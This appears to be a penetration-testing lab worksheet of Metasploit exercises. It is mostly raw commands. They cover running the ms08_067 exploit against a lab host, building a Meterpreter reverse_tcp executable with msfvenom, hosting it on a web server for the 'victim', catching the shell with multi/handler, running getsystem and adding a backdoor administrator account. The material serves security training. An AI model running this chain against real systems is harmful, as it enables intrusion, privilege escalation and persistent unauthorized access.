Using the Metasploit Framework
In this module, you will complete the following exercises:
Exercise 1 - Using the Metasploit Framework Exercise 2 - Setting Module Options Exercise 3 - Using Payloads Exercise 4 - Creating Standalone Payloads with Msfvenom
Exercise 1- Using the Metasploit Framework
Task 2 - Starting Metasploit
msfconsole
Task 3 - Finding Metasploit Modules
search platform:windows search ms15-001 clear search cve:2018 type:exploit
Task 4 - Using the Module Database from rapid7:
https://www.rapid7.com/db
in the first text box, type the following text: ms15-001 (optional: Type Module)
Exercise 2 - Setting the Module Options
Task 1 - Set the Module Options
search ms15-001 info exploit/windows/local/ntapphelpcachecontrol use windows/local/ntapphelpcachecontrol show options back use windows/smb/ms08_067_netapi show options show targets clear set RHOST 192.168.0.5 exploit
Exercise 3 - Using Payloads
clear show payloads clear set PAYLOAD windows/shell/reverse_tcp
Exercise 4 - Creating Standalone Payloads with Msfvenom
quit msfvenom -l payloads clear msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 -f exe -o payload.exe
Task 2 - Sharing the Payload with the Victim
cp payload.exe /var/www/html http://192.168.0.3/payload.exe
Task 3 - Use the Multi/handler Module and Exploit the System
msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST 192.168.0.3 exploit getuid getsystem shell net users net user /add plab Test**1234 net localgroup administrators plab /add net users
Links:
- https://www.amanhardikar.com/mindmaps/Practice.html PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
- https://www.exploit-db.com/google-hacking-database Google Hacks